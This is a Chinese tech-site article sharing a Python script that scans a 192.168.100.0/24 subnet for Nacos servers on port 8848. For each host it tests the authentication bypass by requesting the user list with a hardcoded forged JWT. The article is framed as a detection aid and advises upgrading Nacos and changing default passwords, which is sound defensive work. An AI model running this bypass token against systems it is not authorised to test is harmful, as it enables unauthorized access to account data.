官方确认,低版本的nacos服务管理平台存在多个安全漏洞。这些漏洞可能导致配置文件中的敏感信息泄漏或系统被入侵的风险。
今天浩道跟大家分享一个python脚本,主要用于自动检测某网段内主机上可能存在的nacos漏洞,可以方便大家对某网段内多台主机进行检测,一起看看吧!
如存在漏洞,建议及时升级nacos服务管理平台的版本,并修改默认密码,删除多余管理账号。
nacos.py脚本信息如下,大家可以根据自己实际网段修改对应代码即可。该脚本实现扫描的是192.168.100.0网段内主机上的nacos漏洞。
import requests import urllib3 import threading import socket urllib3.disable_warnings() # 定义自定义路径和Header custom_path = '/nacos/v1/auth/users?pageNo=1&pageSize=2' header = { "User-Agent": "Nacos-Server", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Authorization": "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Pragma": "no-cache", "Te": "trailers", "Cache-Control": "no-cache", } # 定义函数,用于发起GET请求并判断回显结果,每次调用这个函数发送一个请求 def send_request(url): full_url = url + custom_path # 拼接完整URL try: response = requests.get(full_url, headers=header, verify=False, timeout=2) if response.status_code == 200 and response.content.find(b"pageNumber") != -1: print(f'{url} 存在nacos身份验证绕过漏洞') else: print(f'{url} 不存在nacos身份验证绕过漏洞') except requests.exceptions.RequestException as e: print(f'{url} 访问失败 {e}') # Function to check if port 8848 is open on a given IP address def is_port_open(ip, port): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(2) # Set a timeout of 2 seconds for the connection attempt result = sock.connect_ex((ip, port)) sock.close() return result == 0 # Scan the 192.168.100.1 network segment for hosts with port 8848 open nacos_hosts = [] for i in range(1, 256): ip_address = f'192.168.100.{i}' if is_port_open(ip_address, 8848): nacos_hosts.append(ip_address) # Perform Nacos vulnerability check for hosts with port 8848 open if not nacos_hosts: print("No Nacos server found on port 8848 in the 192.168.100.1 network segment.") else: print(f"Found Nacos server(s) on port 8848: {', '.join(nacos_hosts)}") threads = [] for host in nacos_hosts: t = threading.Thread(target=send_request, args=(f"http://{host}:8848",)) threads.append(t) t.start() # Wait for all threads to complete for t in threads: t.join()
以下针对三个网段执行脚本,如下图所示:
责任编辑:彭菁
声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。
举报投诉
-
文件
+关注
关注
1文章
540浏览量
24402 -
代码
+关注
关注
30文章
4555浏览量
66766 -
漏洞
+关注
关注
0文章
193浏览量
15114 -
python
+关注
关注
51文章
4675浏览量
83466 -
扫描器
+关注
关注
0文章
130浏览量
11754
原文标题:【python实战脚本分享】自动检测nacos漏洞!
文章出处:【微信号:浩道linux,微信公众号:浩道linux】欢迎添加关注!文章转载请注明出处。
发布评论请先 登录
相关推荐
[原创]Honeywell Xenon 1902gHD无线二维影像扫描器
Honeywell Xenon 1902gHD无线二维影像扫描器广州万碧是美国霍尼韦尔Honeywell系列条码扫描器中国地区经销商,部分型号列表:Xenon 1900手持式
发表于 06-02 23:24
选择固定式扫描器的方法
一、生产制造业选择固定式扫描器的方法 工业环境有着其独特的特殊性,对于固定式扫描器的分辨率和读码率的要求非常高,同时对防尘、防水溅等级和跌落等级也都有着非常高的要求,需要能在较大的温度范围里
发表于 12-07 17:18
基于TPS61376的条码扫描器方案
条码扫描器又称为条码阅读器,条码扫描枪等。条码扫描器利用光电原理将条码信息转化为计算机可接受的信息的输入设备,常用于图书馆、医院、书店、超市以及物流等行业。图1.条码
发表于 11-03 08:21
干货:基于指纹识别的漏洞扫描设计方案
漏洞扫描器大家都不陌生,几乎是每家公司必备的安全产品。几乎早在快10年前,作为安全乙方,就需要扛着一台极光扫描器,到全国各地去做各种安服。在当时极光扫描器就是一款非常成熟的商业产品了,
无线蓝牙扫描器应该怎么选购?有哪些注意事项?
扫描器用于扫描条码,有的可以扫一维码,有的既可以扫一维码又可以扫二维码,通讯模式方面,扫描器可以通过无线蓝牙传输,比有线的方便一些。那么,无线蓝牙扫描器应该怎么选购?有哪些注意事项?
发表于 08-07 17:40
•583次阅读
一款网络摄像头漏洞扫描工具
项目地址:https://github.com/jorhelp/Ingram 简介 主要针对网络摄像头的漏洞扫描框架,目前已集成海康、大华、宇视、dlink等常见设备 端口扫描器 我们可以
评论